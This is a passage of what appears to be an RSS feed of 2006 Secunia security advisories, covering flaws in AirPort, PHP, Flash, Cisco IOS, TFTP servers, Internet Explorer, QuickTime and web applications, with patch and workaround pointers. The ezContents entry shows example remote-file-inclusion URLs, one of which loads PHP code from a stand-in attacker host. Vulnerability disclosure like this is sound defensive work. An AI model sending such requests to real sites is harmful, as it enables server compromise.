Some vulnerabilities have been reported in AirPort, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a vulnerable system.<br>
<br>
1) Two boundary errors exist in the handling of malformed wireless network frames. These can be exploited to cause a stack-based buffer overflow by sending a malicious frame to the system, and may allow arbitrary code execution with system privileges.<br>
<br>
The vulnerability affects the following products equipped with wireless:<br>
* Power Mac<br>
* PowerBook<br>
* iBook<br>
* iMac<br>
* Mac Pro<br>
* Xserve<br>
* PowerPC-based Mac mini<br>
<br>
2) A boundary error exists in the AirPort wireless driver's handling of scan cache updates. This can be exploited to cause a buffer overflow by sending a malicious frame to the system and may lead to a system crash, privilege elevation, or execution of arbitrary code with system privileges.<br>
<br>
3) An integer overflow exist in the AirPort wireless drivers API for third-party software, which may lead to a buffer overflow in applications using the API. This can be exploited to cause a buffer overflow by sending a malicious frame to the system and could crash the application or lead to arbitrary code execution with privileges of the user running the application.<br>
<br>
Vulnerabilities #2 and #3 affect Intel-based Mac mini, MacBook, and MacBook Pro equipped with wireless and does not affect systems prior to Mac OS X v10.4.<br>
<br>
Solution:<br>
Apply Security Update 2006-005 or AirPort Update 2006-001:<br>
http://www.apple.com/support/downloads/<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Original Advisory:<br>
http://docs.info.apple.com/article.html?artnum=304420<br>
<br>
Other References:<br>
US-CERT VU#563492:<br>
http://www.kb.cert.org/vuls/id/563492<br>
<br>
US-CERT VU#589540:<br>
http://www.kb.cert.org/vuls/id/589540<br>
<br>
US-CERT VU#867796:<br>
http://www.kb.cert.org/vuls/id/867796<br>
]]></description>
            <link>http://secunia.com/advisories/22068/</link>
            <pubDate>Tue, 26 Sep 2006 15:20:28 -0400</pubDate>
        </item>

        <item>
            <title>Red Hat update for php</title>
            <description><![CDATA[Secunia Advisory:   	 SA22004  	  <br>
Release Date: 	2006-09-22<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
Cross Site Scripting<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	RedHat Enterprise Linux AS 2.1<br>
RedHat Enterprise Linux ES 2.1<br>
RedHat Enterprise Linux WS 2.1<br>
RedHat Linux Advanced Workstation 2.1 for Itanium<br>
<br>
CVE reference:	CVE-2006-3016 (Secunia mirror)<br>
CVE-2006-4020 (Secunia mirror)<br>
CVE-2006-4482 (Secunia mirror)<br>
CVE-2006-4486 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Red Hat has issued an update for php. This fixes some vulnerabilities, which can be exploited by malicious, local users to bypass certain security restrictions, and by malicious people to conduct cross-site scripting and HTTP response splitting attacks, cause a DoS (Denial of Service) and potentially compromise a vulnerable system.<br>
<br>
For more information:<br>
SA21328<br>
SA21403<br>
SA21546<br>
<br>
Solution:<br>
Updated packages are available from Red Hat Network.<br>
http://rhn.redhat.com<br>
<br>
Original Advisory:<br>
http://rhn.redhat.com/errata/RHSA-2006-0682.html<br>
<br>
Other References:<br>
SA21328:<br>
http://secunia.com/advisories/21328/<br>
<br>
SA21403:<br>
http://secunia.com/advisories/21403/<br>
<br>
SA21546:<br>
http://secunia.com/advisories/21546/<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/22004/</link>
            <pubDate>Tue, 26 Sep 2006 15:19:51 -0400</pubDate>
        </item>

        <item>
            <title>SUSE update for flash-player</title>
            <description><![CDATA[Secunia Advisory:   	 SA22054  	  <br>
Release Date: 	2006-09-21<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
Cross Site Scripting<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	SUSE Linux 10<br>
SUSE Linux 10.1<br>
SUSE Linux 9.2<br>
SUSE Linux 9.3<br>
<br>
CVE reference:	CVE-2006-3311 (Secunia mirror)<br>
CVE-2006-3587 (Secunia mirror)<br>
CVE-2006-3588 (Secunia mirror)<br>
CVE-2006-4640 (Secunia mirror)<br>
<br>
<br>
Description:<br>
SUSE has issued an update for flash-player. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions or compromise a user's system.<br>
<br>
For more information:<br>
SA20971<br>
SA21865<br>
<br>
Solution:<br>
Apply updated packages.<br>
<br>
x86 Platform:<br>
<br>
SUSE LINUX 10.1:<br>
ftp://ftp.suse.com/pub/suse/update/10...86/flash-player-7.0.68.0-1.2.i586.rpm<br>
63f5401393619b7507ee0799a946585b<br>
<br>
SUSE LINUX 10.0:<br>
<br>
ftp://ftp.suse.com/pub/suse/i386/upda...86/flash-player-7.0.68.0-1.1.i586.rpm<br>
08db4253c044700b8ace05e48c0d1f30<br>
<br>
SUSE LINUX 9.3:<br>
<br>
ftp://ftp.suse.com/pub/suse/i386/upda...86/flash-player-7.0.68.0-1.1.i586.rpm<br>
1da70b61f88ac230d3a32ab86d81dff8<br>
<br>
SUSE LINUX 9.2:<br>
<br>
ftp://ftp.suse.com/pub/suse/i386/upda...86/flash-player-7.0.68.0-1.1.i586.rpm<br>
4e968dc6cb9c786f2059eeb11c71ac57<br>
<br>
Sources:<br>
<br>
SUSE LINUX 10.1:<br>
ftp://ftp.suse.com/pub/suse/update/10...src/flash-player-7.0.68.0-1.2.src.rpm<br>
a2c721f392edc190ee7ed744804819c6<br>
<br>
SUSE LINUX 10.0:<br>
ftp://ftp.suse.com/pub/suse/i386/upda...src/flash-player-7.0.68.0-1.1.src.rpm<br>
73818355a51f9e5ae0d9f82b705d2fa0<br>
<br>
SUSE LINUX 9.3:<br>
ftp://ftp.suse.com/pub/suse/i386/upda...src/flash-player-7.0.68.0-1.1.src.rpm<br>
74a26ba1d763f785a7dc861decdfc042<br>
<br>
SUSE LINUX 9.2:<br>
ftp://ftp.suse.com/pub/suse/i386/upda...src/flash-player-7.0.68.0-1.1.src.rpm<br>
6658938ba3d5b367ccfe62c222606d8f<br>
<br>
Original Advisory:<br>
http://lists.suse.com/archive/suse-security-announce/2006-Sep/0007.html<br>
<br>
Other References:<br>
SA20971:<br>
http://secunia.com/advisories/20971/<br>
<br>
SA21865:<br>
http://secunia.com/advisories/21865/<br>
]]></description>
            <link>http://secunia.com/advisories/22054/</link>
            <pubDate>Tue, 26 Sep 2006 15:18:31 -0400</pubDate>
        </item>

        <item>
            <title>Cisco IOS DOCSIS Community String Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21974  	  <br>
Release Date: 	2006-09-21<br>
Last Update: 	2006-09-26<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	System access<br>
Where: 	From local network<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	Cisco IOS 12.x<br>
Cisco IOS R12.x<br>
<br>
CVE reference:	CVE-2006-4950 (Secunia mirror)<br>
<br>
<br>
Description:<br>
A vulnerability has been reported in Cisco IOS, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is due to an error, which inadvertently enables an additional read-write community string for DOCSIS-compliant cable-capable devices when the device is configured for SNMP management. This may be exploited to gain full control of the device.<br>
<br>
The vulnerability has been reported in the following devices running Cisco IOS:<br>
* Cisco IAD2430 Integrated Access Device<br>
* Cisco IAD2431 Integrated Access Device<br>
* Cisco IAD2432 Integrated Access Device<br>
* Cisco VG224 Analog Phone Gateway<br>
* Cisco MWR 1900 Mobile Wireless Edge Router<br>
* Cisco MWR 1941 Mobile Wireless Edge Router<br>
<br>
Solution:<br>
Fixes are available (see patch matrix in vendor advisory).<br>
http://www.cisco.com/warp/public/707/cisco-sa-20060920-docsis.shtml<br>
<br>
Provided and/or discovered by:<br>
Reported by the vendor.<br>
<br>
Changelog:<br>
2006-09-26: Added CVE reference.<br>
<br>
Original Advisory:<br>
http://www.cisco.com/warp/public/707/cisco-sa-20060920-docsis.shtml]]></description>
            <link>http://secunia.com/advisories/21974/</link>
            <pubDate>Tue, 26 Sep 2006 15:16:59 -0400</pubDate>
        </item>

        <item>
            <title>TFTP Server TFTPDWIN Buffer Overflow Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21854  	  <br>
Release Date: 	2006-09-21<br>
Last Update: 	2006-09-26<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	System access<br>
Where: 	From local network<br>
Solution Status: 	Unpatched<br>
<br>
Software:	TFTP Server TFTPDWIN 0.x<br>
<br>
CVE reference:	CVE-2006-4948 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Parvez Anwar has discovered a vulnerability in TFTP Server TFTPDWIN, which can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to a boundary error in tftpd.exe during the processing of requested resources. This can be exploited to cause a stack-based buffer overflow by requesting a resource with an overly long name (more than 280 bytes).<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
The vulnerability is confirmed in version 0.4.2. Other versions may also be affected.<br>
<br>
Solution:<br>
Restrict use of the TFTP service to trusted networks only.<br>
<br>
Provided and/or discovered by:<br>
Parvez Anwar<br>
]]></description>
            <link>http://secunia.com/advisories/21854/</link>
            <pubDate>Tue, 26 Sep 2006 15:15:37 -0400</pubDate>
        </item>

        <item>
            <title>SGI Advanced Linux Environment Multiple Updates</title>
            <description><![CDATA[Secunia Advisory:   	 SA22036  	  <br>
Release Date: 	2006-09-20<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
Spoofing<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
OS:	SGI Advanced Linux Environment 3<br>
<br>
CVE reference:	CVE-2006-3743 (Secunia mirror)<br>
CVE-2006-3744 (Secunia mirror)<br>
CVE-2006-4144 (Secunia mirror)<br>
CVE-2006-3459 (Secunia mirror)<br>
CVE-2006-3460 (Secunia mirror)<br>
CVE-2006-3461 (Secunia mirror)<br>
CVE-2006-3462 (Secunia mirror)<br>
CVE-2006-3463 (Secunia mirror)<br>
CVE-2006-3464 (Secunia mirror)<br>
CVE-2006-3465 (Secunia mirror)<br>
CVE-2006-1168 (Secunia mirror)<br>
CVE-2006-4339 (Secunia mirror)<br>
CVE-2006-4253 (Secunia mirror)<br>
CVE-2006-4340 (Secunia mirror)<br>
CVE-2006-4565 (Secunia mirror)<br>
CVE-2006-4566 (Secunia mirror)<br>
CVE-2006-4568 (Secunia mirror)<br>
CVE-2006-4570 (Secunia mirror)<br>
CVE-2006-4571 (Secunia mirror)<br>
<br>
<br>
Description:<br>
SGI has issued a patch for SGI Advanced Linux Environment. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions, conduct spoofing attacks, cause a DoS (Denial of Service), and potentially compromise a vulnerable system.<br>
<br>
For more information:<br>
SA21621<br>
SA21632<br>
SA21791<br>
SA21880<br>
SA21915<br>
<br>
Solution:<br>
Apply patch 10332 for SGI ProPack 3 Service Pack 6.<br>
http://support.sgi.com/<br>
<br>
Original Advisory:<br>
ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc<br>
<br>
Other References:<br>
SA21621:<br>
http://secunia.com/advisories/21621/<br>
<br>
SA21632:<br>
http://secunia.com/advisories/21632/<br>
<br>
SA21791:<br>
http://secunia.com/advisories/21791/<br>
<br>
SA21880:<br>
http://secunia.com/advisories/21880/<br>
<br>
SA21915:<br>
http://secunia.com/advisories/21915/]]></description>
            <link>http://secunia.com/advisories/22036/</link>
            <pubDate>Tue, 26 Sep 2006 15:15:10 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: (Zero Day) Microsoft Internet Explorer VML Code Execution Vulnerability (UNPATCHED)</title>
            <description><![CDATA[Secunia Advisory:   	 SA21989  	  <br>
Release Date: 	2006-09-19<br>
<br>
Critical: 	<br>
Extremely critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	Microsoft Internet Explorer 6.x<br>
<br>
<br>
Description:<br>
A vulnerability has been discovered in Microsoft Internet Explorer, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to an error in the processing of Vector Markup Language (VML) documents. This can be exploited by e.g. tricking a user into viewing a malicious VML document containing an overly long "fill" method inside a "rect" tag.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
NOTE: Reportedly, this is currently being exploited in the wild.<br>
<br>
The vulnerability has been confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP2. Other versions may also be affected.<br>
<br>
Solution:<br>
Do not visit untrusted web sites.<br>
<br>
Deactivating Active Scripting will prevent exploitation using the currently known exploit.<br>
<br>
Provided and/or discovered by:<br>
Sample exploit provided by Sunbelt Software.<br>
]]></description>
            <link>http://secunia.com/advisories/21989/</link>
            <pubDate>Tue, 19 Sep 2006 09:46:40 -0400</pubDate>
        </item>

        <item>
            <title>Mozilla Thunderbird Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA21939  	  <br>
Release Date: 	2006-09-15<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
DoS<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	Mozilla Thunderbird 0.x<br>
Mozilla Thunderbird 1.0.x<br>
Mozilla Thunderbird 1.5.x<br>
<br>
CVE reference:	CVE-2006-4253 (Secunia mirror)<br>
CVE-2006-4339 (Secunia mirror)<br>
CVE-2006-4340 (Secunia mirror)<br>
CVE-2006-4565 (Secunia mirror)<br>
CVE-2006-4566 (Secunia mirror)<br>
CVE-2006-4567 (Secunia mirror)<br>
CVE-2006-4570 (Secunia mirror)<br>
CVE-2006-4571 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Some vulnerabilities have been reported in Mozilla Thunderbird, which can be exploited by malicious people to conduct man-in-the-middle attacks, bypass certain security restrictions, and potentially compromise a user's system.<br>
<br>
The problem is that scripts in remote XBL files in e-mails can be executed even when JavaScript has been disabled (JavaScript is disabled by default). This can be exploited to cause JavaScript code to be executed whenever the HTML content of an e-mail is being viewed, forwarded, or replied to. This may also enable exploitation of vulnerabilities requiring JavaScript.<br>
<br>
Successful exploitation requires that the "Load Images" setting is enabled.<br>
<br>
Some other vulnerabilities have also been reported. For more information:<br>
SA21903<br>
<br>
And vulnerabilities #1, #2, #3, and #7 in:<br>
SA21906<br>
<br>
NOTE: Exploitation of some of the vulnerabilities requires that JavaScript is enabled.<br>
<br>
Solution:<br>
Update to version 1.5.0.7.<br>
http://www.mozilla.com/thunderbird/<br>
<br>
Provided and/or discovered by:<br>
Georgi Guninski<br>
<br>
Original Advisory:<br>
http://www.mozilla.org/security/announce/2006/mfsa2006-63.html<br>
<br>
Other References:<br>
SA21903:<br>
http://secunia.com/advisories/21903/<br>
<br>
SA21906:<br>
http://secunia.com/advisories/21906/]]></description>
            <link>http://secunia.com/advisories/21939/</link>
            <pubDate>Tue, 19 Sep 2006 09:45:52 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: (Zero Day) Internet Explorer daxctle.ocx &quot;KeyFrame()&quot; Method Vulnerability (UNPATCHED)</title>
            <description><![CDATA[Secunia Advisory:   	 SA21910  	  <br>
Release Date: 	2006-09-14<br>
Last Update: 	2006-09-18<br>
<br>
Critical: 	<br>
Extremely critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	Microsoft Internet Explorer 6.x<br>
<br>
CVE reference:	CVE-2006-4777 (Secunia mirror)<br>
CVE-2006-4446 (Secunia mirror)<br>
<br>
<br>
Description:<br>
nop has discovered a vulnerability in Internet Explorer, which can be exploited by malicious people to compromise a user's system.<br>
<br>
The vulnerability is caused due to a memory corruption error in the Microsoft Multimedia Controls ActiveX control (daxctle.ocx) in the "CPathCtl::KeyFrame()" function. This can be exploited by e.g. tricking a user into viewing a malicious HTML document passing specially crafted arguments to the ActiveX control's "KeyFrame()" method.<br>
<br>
Successful exploitation allows execution of arbitrary code.<br>
<br>
NOTE: A somewhat working exploit is publicly available for partially patched versions of Windows 2000. However, Secunia has successfully created a fully working exploit for Windows XP SP2 (fully patched).<br>
<br>
It is also possible to crash the browser via the "Spline()" method.<br>
<br>
Solution:<br>
Only allow trusted websites to run ActiveX controls.<br>
<br>
Provided and/or discovered by:<br>
nop<br>
<br>
Changelog:<br>
2006-09-15: Added Microsoft, US-CERT, and CVE references.<br>
2006-09-18: Added CVE reference.<br>
<br>
Original Advisory:<br>
http://www.xsec.org/index.php?module=releases&act=view&type=2&id=20<br>
<br>
Microsoft:<br>
http://www.microsoft.com/technet/security/advisory/925444.mspx<br>
<br>
Other References:<br>
US-CERT VU#377369:<br>
http://www.kb.cert.org/vuls/id/377369<br>
]]></description>
            <link>http://secunia.com/advisories/21910/</link>
            <pubDate>Tue, 19 Sep 2006 09:44:56 -0400</pubDate>
        </item>

        <item>
            <title>Cisco CatOS VTP Configuration Revision Handling Vulnerability</title>
            <description><![CDATA[Secunia Advisory:   	 SA21902  	  <br>
Release Date: 	2006-09-14<br>
<br>
Critical: 	<br>
Less critical<br>
Impact: 	Manipulation of data<br>
DoS<br>
Where: 	From local network<br>
Solution Status: 	Vendor Workaround<br>
<br>
OS:	Cisco CATOS 5.x<br>
Cisco CATOS 6.x<br>
Cisco CATOS 7.x<br>
Cisco CATOS 8.x<br>
<br>
<br>
Description:<br>
FX has reported a vulnerability in Cisco CatOS, which can be exploited by malicious people to cause a DoS (Denial of Service).<br>
<br>
For more information, see vulnerability #2 in:<br>
SA21896<br>
<br>
The vulnerability affects switches with VTP Operating Mode as either "server" or "client".<br>
<br>
Solution:<br>
The vendor recommends applying a VTP domain password to the VTP domain (see the vendor's advisory for details).<br>
<br>
Provided and/or discovered by:<br>
FX, Phenoelit.<br>
<br>
Original Advisory:<br>
http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml<br>
<br>
Other References:<br>
SA21896:<br>
http://secunia.com/advisories/21896/<br>
]]></description>
            <link>http://secunia.com/advisories/21902/</link>
            <pubDate>Tue, 19 Sep 2006 09:44:27 -0400</pubDate>
        </item>

        <item>
            <title>Cisco IOS VTP Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA21896  	  <br>
Release Date: 	2006-09-14<br>
Last Update: 	2006-09-18<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	Manipulation of data<br>
DoS<br>
System access<br>
Where: 	From local network<br>
Solution Status: 	Vendor Workaround<br>
<br>
OS:	Cisco IOS 10.x<br>
Cisco IOS 11.x<br>
Cisco IOS 12.x<br>
Cisco IOS R11.x<br>
Cisco IOS R12.x<br>
<br>
CVE reference:	CVE-2006-4774 (Secunia mirror)<br>
CVE-2006-4775 (Secunia mirror)<br>
CVE-2006-4776 (Secunia mirror)<br>
<br>
<br>
Description:<br>
FX has reported some vulnerabilities in Cisco IOS, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially to compromise a vulnerable network device.<br>
<br>
1) An error exists in the handling of summary packets in the VLAN Truncing Protocol (VTP). This can be exploited to reset the switch with a Software Forced Crash Exception by sending a specially crafted packet to a trunk enabled port.<br>
<br>
2) An integer overflow error exists in the VTP configuration revision handling. This can be exploited to prevent that changes to the VLAN database are properly propagated throughout the VTP domain by sending a specially crafted packet containing 0x7FFFFFFF as a configuration revision number.<br>
<br>
3) A boundary error exists in the processing of VTP summary advertisement messages. This can be exploited to cause a heap-based buffer overflow by sending a specially crafted message containing an overly long VLAN name (more than 100 characters) to a trunk enabled port.<br>
<br>
Successful exploitation may allow arbitrary code execution.<br>
<br>
NOTE: The packets must be received with a matching domain name and a matching VTP domain password (if configured).<br>
<br>
The vulnerabilities affect Cisco IOS with a VTP Operating Mode as either "server" or "client".<br>
<br>
Solution:<br>
A fix is reportedly available for vulnerability #1. The vendor also recommends applying a VTP domain password to the VTP domain (see the vendor's advisory for details).<br>
<br>
Provided and/or discovered by:<br>
FX, Phenoelit.<br>
<br>
Changelog:<br>
2006-09-18: Added CVE references.<br>
<br>
Original Advisory:<br>
Phenoelit:<br>
http://www.phenoelit.de/stuff/CiscoVTP.txt<br>
<br>
Cisco:<br>
http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml]]></description>
            <link>http://secunia.com/advisories/21896/</link>
            <pubDate>Tue, 19 Sep 2006 09:43:45 -0400</pubDate>
        </item>

        <item>
            <title>Apple QuickTime Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA21893  	  <br>
Release Date: 	2006-09-13<br>
Last Update: 	2006-09-18<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	Apple QuickTime 7.x<br>
<br>
CVE reference:	CVE-2006-4381 (Secunia mirror)<br>
CVE-2006-4382 (Secunia mirror)<br>
CVE-2006-4384 (Secunia mirror)<br>
CVE-2006-4385 (Secunia mirror)<br>
CVE-2006-4386 (Secunia mirror)<br>
CVE-2006-4388 (Secunia mirror)<br>
CVE-2006-4389 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Multiple vulnerabilities have been reported in Apple QuickTime, which can be exploited by malicious people to compromise a user's system.<br>
<br>
1) Errors in the processing of H.264 movies can be exploited to trigger an integer overflow or buffer overflow.<br>
<br>
2) A boundary error within the processing of QuickTime movies can be exploited to cause a buffer overflow.<br>
<br>
3) A boundary error within the processing of FLC movies can be exploited to cause a heap-based buffer overflow via a FLC movie with a specially crafted COLOR_64 chunk.<br>
<br>
4) Errors within the processing of FlashPix files can be exploited to cause an integer overflow or buffer overflow.<br>
<br>
5) An error within the processing of FlashPix files can be exploited to trigger an exception leaving an uninitialised object.<br>
<br>
6) A boundary error within the processing of SGI images can be exploited to cause a buffer overflow.<br>
<br>
Successful exploitation of the vulnerabilities may allow execution of arbitrary code.<br>
<br>
Solution:<br>
Update to version 7.1.3.<br>
http://www.apple.com/quicktime/download/<br>
<br>
Provided and/or discovered by:<br>
The vendor credits:<br>
1) Sowhat of Nevis Labs, Mike Price of McAfee AVERT Labs, and Piotr Bania.<br>
2) Mike Price of McAfee AVERT Labs.<br>
3) Mike Price of McAfee AVERT Labs and Ruben Santamarta.<br>
4) Mike Price of McAfee AVERT Labs.<br>
5) Mike Price of McAfee AVERT Labs.<br>
6) Mike Price of McAfee AVERT Labs<br>
<br>
Changelog:<br>
2006-09-14: Added links to US-CERT.<br>
2006-09-18: Added links to US-CERT.<br>
<br>
Original Advisory:<br>
Apple:<br>
http://docs.info.apple.com/article.html?artnum=304357<br>
<br>
iDEFENSE:<br>
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=413<br>
<br>
Reverse Mode:<br>
http://www.reversemode.com/index.php?...;Itemid=2&func=fileinfo&id=25<br>
<br>
Piotr Bania:<br>
http://pb.specialised.info/all/adv/quicktime-integer-overflow-h264-adv-7.1.txt<br>
<br>
Other References:<br>
US-CERT VU#489836:<br>
http://www.kb.cert.org/vuls/id/489836<br>
<br>
US-CERT VU#540348:<br>
http://www.kb.cert.org/vuls/id/540348<br>
<br>
US-CERT VU#554252:<br>
http://www.kb.cert.org/vuls/id/554252<br>
<br>
US-CERT VU#683700:<br>
http://www.kb.cert.org/vuls/id/683700<br>
<br>
US-CERT VU#200316:<br>
http://www.kb.cert.org/vuls/id/200316<br>
<br>
US-CERT VU#308204:<br>
http://www.kb.cert.org/vuls/id/308204]]></description>
            <link>http://secunia.com/advisories/21893/</link>
            <pubDate>Tue, 19 Sep 2006 09:42:58 -0400</pubDate>
        </item>

        <item>
            <title>Exploit: TFTP Server MT Absolute Path Construction Buffer Overflow</title>
            <description><![CDATA[Secunia Advisory:   	 SA21844  	  <br>
Release Date: 	2006-09-12<br>
Last Update: 	2006-09-18<br>
<br>
Critical: 	<br>
Moderately critical<br>
Impact: 	DoS<br>
System access<br>
Where: 	From local network<br>
Solution Status: 	Unpatched<br>
<br>
Software:	TFTP Server MT 1.x<br>
<br>
CVE reference:	CVE-2006-4781 (Secunia mirror)<br>
<br>
<br>
Description:<br>
n00b has discovered a vulnerability in TFTP Server MT, which potentially can be exploited by malicious people to compromise a vulnerable system.<br>
<br>
The vulnerability is caused due to a boundary error when constructing the absolute path to a requested resource. This can be exploited to cause a heap-based buffer overflow by supplying an overly long string (about 260 bytes) as a resource in a request.<br>
<br>
Successful exploitation may allow execution of arbitrary code.<br>
<br>
The vulnerability is confirmed in version 1.1. Other versions may also be affected.<br>
<br>
Solution:<br>
Restrict use of the TFTP service to trusted networks only.<br>
<br>
Provided and/or discovered by:<br>
n00b<br>
<br>
Changelog:<br>
2006-09-18: Added CVE reference.<br>
<br>
Original Advisory:<br>
http://milw0rm.com/exploits/2334]]></description>
            <link>http://secunia.com/advisories/21844/</link>
            <pubDate>Tue, 19 Sep 2006 09:41:33 -0400</pubDate>
        </item>

        <item>
            <title>Adobe Flash Player Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA21865  	  <br>
Release Date: 	2006-09-12<br>
Last Update: 	2006-09-18<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Security Bypass<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Vendor Patch<br>
<br>
Software:	Macromedia Flash 8.x<br>
Macromedia Flash MX 2004<br>
Macromedia Flash MX Professional 2004<br>
Macromedia Flash Player 7.x<br>
Macromedia Flash Player 8.x<br>
Macromedia Flex 1.x<br>
<br>
CVE reference:	CVE-2006-3014 (Secunia mirror)<br>
CVE-2006-3311 (Secunia mirror)<br>
CVE-2006-4640 (Secunia mirror)<br>
<br>
<br>
Description:<br>
Multiple vulnerabilities have been reported in Adobe Flash Player, which can be exploited by malicious people to bypass certain security restrictions or compromise a user's system.<br>
<br>
1) A boundary error during the handling of strings dynamically generated at runtime can be exploited to cause a buffer overflow via an overly long string.<br>
<br>
Successful exploitation allows execution of arbitrary code when e.g. visiting a malicious website.<br>
<br>
2) An unspecified error allows bypassing the "allowScriptAccess" option.<br>
<br>
3) Using a "Shockwave Flash Object", it is possible to execute Flash files containing JavaScript embedded in Office documents automatically when the Office document is opened.<br>
<br>
Solution:<br>
Update to version 9.0.16.0 or another fixed version (see the vendor advisory for details).<br>
<br>
Provided and/or discovered by:<br>
1) Stuart Pearson, Computer Terrorism UK Ltd.<br>
2) Reported by the vendor.<br>
3) Debasis Mohanty<br>
<br>
Changelog:<br>
2006-09-13: Updated advisory with additional information.<br>
2006-09-18: Added link to US-CERT.<br>
<br>
Original Advisory:<br>
Adobe:<br>
http://www.adobe.com/support/security/bulletins/apsb06-11.html<br>
<br>
Computer Terrorism:<br>
http://www.computerterrorism.com/research/ct12-09-2006.htm<br>
<br>
Other References:<br>
Microsoft:<br>
http://www.microsoft.com/technet/security/advisory/925143.mspx<br>
<br>
US-CERT VU#451380:<br>
http://www.kb.cert.org/vuls/id/451380<br>
<br>
<br>
]]></description>
            <link>http://secunia.com/advisories/21865/</link>
            <pubDate>Tue, 19 Sep 2006 09:40:17 -0400</pubDate>
        </item>

        <item>
            <title>ezContents Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA21703  	  <br>
Release Date: 	2006-08-31<br>
Last Update: 	2006-09-04<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Cross Site Scripting<br>
Manipulation of data<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	ezContents 2.x<br>
<br>
CVE reference:	CVE-2006-4477 (Secunia mirror)<br>
CVE-2006-4478 (Secunia mirror)<br>
CVE-2006-4479 (Secunia mirror)<br>
<br>
<br>
Description:<br>
DarkFig has discovered some vulnerabilities in ezContents, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks or to compromise a vulnerable system.<br>
<br>
1) An error within the "moduleExternalLink()" function in modules/moduleSec.php allows to include arbitrary files from local resources, or from external resources by e.g. using the "ftps" protocol. Note that the "isExternalLink()" function in include/functions.php and the "adminExternalLink()" function in admin/adminbutton.php suffer from the same error.<br>
<br>
Example:<br>
http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://attacker/file.php<br>
http://host/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=/tmp/file.php%00<br>
<br>
2) Input passed to the "groupname" parameter in headeruserdata.php is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injection arbitrary SQL code.<br>
<br>
3) Input passed to the "subgroupname" parameter in loginreg2.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site.<br>
<br>
The vulnerabilities have been confirmed in version 2.0.3. Other versions may also be affected.<br>
<br>
Solution:<br>
Edit the source code to ensure that input is properly verified.<br>
<br>
Provided and/or discovered by:<br>
DarkFig<br>
]]></description>
            <link>http://secunia.com/advisories/21703/</link>
            <pubDate>Fri, 08 Sep 2006 13:57:41 -0400</pubDate>
        </item>

        <item>
            <title>Membrepass Multiple Vulnerabilities</title>
            <description><![CDATA[Secunia Advisory:   	 SA21715  	  <br>
Release Date: 	2006-09-01<br>
Last Update: 	2006-09-08<br>
<br>
Critical: 	<br>
Highly critical<br>
Impact: 	Cross Site Scripting<br>
Manipulation of data<br>
System access<br>
Where: 	From remote<br>
Solution Status: 	Unpatched<br>
<br>
Software:	Membrepass 1.x<br>
<br>
CVE reference:	CVE-2006-4528 (Secunia mirror)<br>
CVE-2006-4529 (Secunia mirror)<br>
CVE-2006-4530 (Secunia mirror)<br>
<br>
<br>
Description:<br>
DarkFig has discovered some vulnerabilities in Membrepass, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks, and to compromise a vulnerable system.<br>
<br>
